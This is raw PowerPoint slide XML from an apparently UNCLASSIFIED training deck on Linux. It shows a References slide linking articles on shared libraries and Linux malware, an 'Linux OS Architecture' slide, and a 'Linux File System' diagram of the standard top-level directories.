            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://www.tecmint.com/understanding-shared-libraries-in-linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://www.trustedsec.com/blog/malware-linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3507627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4" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676275" y="781050"/>
            <a:ext cx="10877550" cy="5772150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2178052" y="-9525"/>
            <a:ext cx="7912608" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Linux OS Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3"/>
            <a:ext cx="12192000" cy="366767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90488" tIns="44450" rIns="90488" bIns="44450" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>UNCLASSIFIED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6494466"/>
            <a:ext cx="12192000" cy="366767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90488" tIns="44450" rIns="90488" bIns="44450" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>UNCLASSIFIED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="11522502" y="6541292"/>
            <a:ext cx="415498" cy="313932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{DA903C6E-477B-42BE-B60F-40CFBB4EFC57}" type="slidenum">
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00DFCA"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="30000"/>
                </a:spcBef>
              </a:pPr>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00DFCA"/>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02204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2130427" y="-47625"/>
            <a:ext cx="7912608" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Linux File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3"/>
            <a:ext cx="12192000" cy="366767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90488" tIns="44450" rIns="90488" bIns="44450" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>UNCLASSIFIED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6494466"/>
            <a:ext cx="12192000" cy="366767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90488" tIns="44450" rIns="90488" bIns="44450" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>UNCLASSIFIED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="11522502" y="6541292"/>
            <a:ext cx="415498" cy="313932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{DA903C6E-477B-42BE-B60F-40CFBB4EFC57}" type="slidenum">
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00DFCA"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="30000"/>
                </a:spcBef>
              </a:pPr>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00DFCA"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="525606" y="3089201"/>
            <a:ext cx="1611280" cy="1497813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Root Directory</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Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3642310" y="819150"/>
            <a:ext cx="1743484" cy="5618803"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C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/bin/</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0099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/boot/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>
              <a:ext cx="964941" cy="403654"/>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/dev/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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etc</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14" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C0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/home/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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/lib/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FA0E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/media</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17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00206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mnt</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18" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00DED9"/>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/opt/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>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sbin</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20" name="Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC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srv</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21" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="6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tmp</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22" name="Rectangle 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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usr</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23" name="Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763265"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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var</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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/root/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>proc</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2136886" y="994738"/>
            <a:ext cx="1505429" cy="2843370"/>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27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2136886" y="1345914"/>
            <a:ext cx="1505428" cy="2492194"/>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28" name="Straight Connector 27"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2136886" y="1697089"/>
            <a:ext cx="1505428" cy="2141019"/>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29" name="Straight Connector 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2136886" y="2048264"/>
            <a:ext cx="1505426" cy="1789844"/>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30" name="Straight Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="14" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2136886" y="2399439"/>
            <a:ext cx="1505428" cy="1438669"/>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31" name="Straight Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2136886" y="2750615"/>
            <a:ext cx="1505426" cy="1087493"/>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32" name="Straight Connector 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2136886" y="3838108"/>
            <a:ext cx="1505426" cy="2424258"/>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33" name="Straight Connector 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="24" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2136886" y="3838108"/>
            <a:ext cx="1505428" cy="2073083"/>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34" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2136886" y="3838108"/>
            <a:ext cx="1505428" cy="1721908"/>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35" name="Straight Connector 34"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2136886" y="3838108"/>
            <a:ext cx="1505429" cy="1370732"/>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36" name="Straight Connector 35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="18" idx="1"/>
